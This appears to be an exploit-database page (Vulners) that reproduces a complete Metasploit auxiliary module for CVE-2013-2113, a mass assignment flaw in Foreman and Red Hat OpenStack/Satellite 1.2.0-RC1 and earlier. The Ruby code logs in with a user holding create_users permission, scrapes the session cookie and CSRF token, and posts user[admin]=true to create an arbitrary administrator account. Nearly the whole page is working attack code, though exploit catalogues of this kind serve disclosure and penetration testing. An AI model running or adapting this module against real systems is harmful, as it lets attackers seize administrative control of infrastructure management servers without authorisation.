Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment

🗓️ 01 Jul 2014 00:00:00Reported by RootType
Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment exploi

                                                ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require &#39;msf/core&#39;

class Metasploit4 &#60; Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient

  def initialize
    super(
      &#39;Name&#39;           =&#62; &#39;Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment&#39;,
      &#39;Description&#39;    =&#62; %q{
          This module exploits a mass assignment vulnerability in the &#39;create&#39;
        action of &#39;users&#39; controller of Foreman and Red Hat OpenStack/Satellite
        (Foreman 1.2.0-RC1 and earlier) by creating an arbitrary administrator
        account. For this exploit to work, your account must have &#39;create_users&#39;
        permission (e.g., Manager role).
      },
      &#39;Author&#39;         =&#62; &#39;Ramon de C Valle&#39;,
      &#39;License&#39;        =&#62; MSF_LICENSE,
      &#39;References&#39;     =&#62;
        [
          [&#39;BID&#39;, &#39;60835&#39;],
          [&#39;CVE&#39;, &#39;2013-2113&#39;],
          [&#39;CWE&#39;, &#39;915&#39;],
          [&#39;OSVDB&#39;, &#39;94655&#39;],
          [&#39;URL&#39;, &#39;https://bugzilla.redhat.com/show_bug.cgi?id=966804&#39;],
          [&#39;URL&#39;, &#39;http://projects.theforeman.org/issues/2630&#39;]
        ],
      &#39;DisclosureDate&#39; =&#62; &#39;Jun 6 2013&#39;
    )

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new(&#39;SSL&#39;, [true, &#39;Use SSL&#39;, true]),
        OptString.new(&#39;USERNAME&#39;, [true, &#39;Your username&#39;]),
        OptString.new(&#39;PASSWORD&#39;, [true, &#39;Your password&#39;]),
        OptString.new(&#39;NEWUSERNAME&#39;, [true, &#39;The username of the new admin account&#39;]),
        OptString.new(&#39;NEWPASSWORD&#39;, [true, &#39;The password of the new admin account&#39;]),
        OptString.new(&#39;NEWEMAIL&#39;, [true, &#39;The email of the new admin account&#39;]),
        OptString.new(&#39;TARGETURI&#39;, [ true, &#39;The path to the application&#39;, &#39;/&#39;]),
      ], self.class
    )
  end

  def run
    print_status(&#34;Logging into #{target_url}...&#34;)
    res = send_request_cgi(
      &#39;method&#39;    =&#62; &#39;POST&#39;,
      &#39;uri&#39;       =&#62; normalize_uri(target_uri.path, &#39;users&#39;, &#39;login&#39;),
      &#39;vars_post&#39; =&#62; {
        &#39;login[login]&#39;    =&#62; datastore[&#39;USERNAME&#39;],
        &#39;login[password]&#39; =&#62; datastore[&#39;PASSWORD&#39;]
      }
    )

    if res.nil?
      print_error(&#39;No response from remote host&#39;)
      return
    end

    if res.headers[&#39;Location&#39;] =~ /users\/login$/
      print_error(&#39;Authentication failed&#39;)
      return
    else
      session = $1 if res.headers[&#39;Set-Cookie&#39;] =~ /_session_id=([0-9a-f]*)/

      if session.nil?
        print_error(&#39;Failed to retrieve the current session id&#39;)
        return
      end
    end

    print_status(&#39;Retrieving the CSRF token for this session...&#39;)
    res = send_request_cgi(
      &#39;cookie&#39; =&#62; &#34;_session_id=#{session}&#34;,
      &#39;method&#39; =&#62; &#39;GET&#39;,
      &#39;uri&#39;    =&#62; normalize_uri(target_uri)
    )

    if res.nil?
      print_error(&#39;No response from remote host&#39;)
      return
    end

    if res.headers[&#39;Location&#39;] =~ /users\/login$/
      print_error(&#39;Failed to retrieve the CSRF token&#39;)
      return
    else
      csrf_param = $1 if res.body =~ /&#60;meta[ ]+content=&#34;(.*)&#34;[ ]+name=&#34;csrf-param&#34;[ ]*\/?&#62;/i
      csrf_token = $1 if res.body =~ /&#60;meta[ ]+content=&#34;(.*)&#34;[ ]+name=&#34;csrf-token&#34;[ ]*\/?&#62;/i

      if csrf_param.nil? || csrf_token.nil?
        csrf_param = $1 if res.body =~ /&#60;meta[ ]+name=&#34;csrf-param&#34;[ ]+content=&#34;(.*)&#34;[ ]*\/?&#62;/i
        csrf_token = $1 if res.body =~ /&#60;meta[ ]+name=&#34;csrf-token&#34;[ ]+content=&#34;(.*)&#34;[ ]*\/?&#62;/i
      end

      if csrf_param.nil? || csrf_token.nil?
        print_error(&#39;Failed to retrieve the CSRF token&#39;)
        return
      end
    end

    print_status(&#34;Sending create-user request to #{target_url(&#39;users&#39;)}...&#34;)
    res = send_request_cgi(
      &#39;cookie&#39;    =&#62; &#34;_session_id=#{session}&#34;,
      &#39;method&#39;    =&#62; &#39;POST&#39;,
      &#39;uri&#39;       =&#62; normalize_uri(target_uri.path, &#39;users&#39;),
      &#39;vars_post&#39; =&#62; {
        csrf_param                    =&#62; csrf_token,
        &#39;user[admin]&#39;                 =&#62; &#39;true&#39;,
        &#39;user[auth_source_id]&#39;        =&#62; &#39;1&#39;,
        &#39;user[login]&#39;                 =&#62; datastore[&#39;NEWUSERNAME&#39;],
        &#39;user[mail]&#39;                  =&#62; datastore[&#39;NEWEMAIL&#39;],
        &#39;user[password]&#39;              =&#62; datastore[&#39;NEWPASSWORD&#39;],
        &#39;user[password_confirmation]&#39; =&#62; datastore[&#39;NEWPASSWORD&#39;]
      }
    )

    if res.nil?
      print_error(&#39;No response from remote host&#39;)
      return
    end

    if res.headers[&#39;Location&#39;] =~ /users$/
      print_good(&#39;User created successfully&#39;)
    else
      print_error(&#39;Failed to create user&#39;)
    end
  end

  def target_url(*args)
    (ssl ? &#39;https&#39; : &#39;http&#39;) +
      if rport.to_i == 80 || rport.to_i == 443
        &#34;://#{vhost}&#34;
      else
        &#34;://#{vhost}:#{rport}&#34;
      end + normalize_uri(target_uri.path, *args)
  end
end
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1